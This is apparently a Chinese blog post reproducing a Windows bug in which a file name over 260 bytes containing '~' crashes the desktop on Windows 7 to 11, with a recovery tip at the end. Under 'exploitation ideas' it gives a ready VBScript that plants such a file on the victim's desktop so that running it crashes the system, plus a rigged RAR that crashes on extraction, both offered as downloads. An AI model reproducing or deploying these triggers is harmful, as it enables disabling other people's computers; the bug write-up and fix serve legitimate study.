特殊文件名导致windows系统崩溃，进PE也依旧崩溃（win7-win11）

本次文章只用于技术讨论，学习，切勿用于非法用途，用于非法用途与本人无关！

本次演示BUG内容截止发文已有安全补丁进行修复，请及时更新系统补丁！

《中华人民共和国刑法》第二百八十六条【破坏计算机信息系统罪】违反国家规定，对计算机信息系统功能进行删除、修改、增加、干扰，造成计算机信息系统不能正常运行，后果严重的，处五年以下有期徒刑或者拘役；后果特别严重的，处五年以上有期徒刑。

视频UP主：epcdiy 、边亮_网络安全

根据上述视频讲述，我在虚拟机进行了BUG复现测试

复现条件

1.一个exe文件（视频中用的是《黑神话：悟空》b2.exe，经测试系统计算器（calc.exe）也可触发此Bug)

2.含有“~”且超过260字节的文件名，后缀(ico、exe、bat均可，或许还有更多)

例如：1111111111111111111111111~111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111.exe

经测试，可轻易复现成功。

在不知道此bug的情况下，如果你是一个电脑高手可能也会束手无策，只能进行重装系统，危害性还是很大的！

Bug利用思考（仅用于测试，切勿用于非法用途）

方法1.vbs自动复现（运行即崩溃）

点击下载：test.vbs

set ws=createobject("WScript.shell")
set fso=createobject("scripting.filesystemobject")
desktop=ws.specialfolders("Desktop")
dim filename,calc
filename="1111111111111111111111111~111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111.exe"
calc="c:\windows\system32\calc.exe"

fso.copyfile calc,desktop&"\"&filename ·复制calc.exe到桌面并改名

方法2.构建特殊压缩文件（解压即崩溃）

使用rar控制台命令对bug文件进行压缩，解压即崩溃

点击下载：解压即崩溃.rar

解决办法

在触发此bug的时候，桌面是无法正常进行点击的，这也就没有办法对文件名进行直接恢复。视频中给出的解决方法是重启后在带命令提示符的安全模式下使用command命令对文件名进行恢复。

但是根本没必要这么麻烦，直接使用键盘Ctrl+alt+del呼出任务管理器，点击文件-运行-cmd-确定就可以直接呼出“命令提示符”了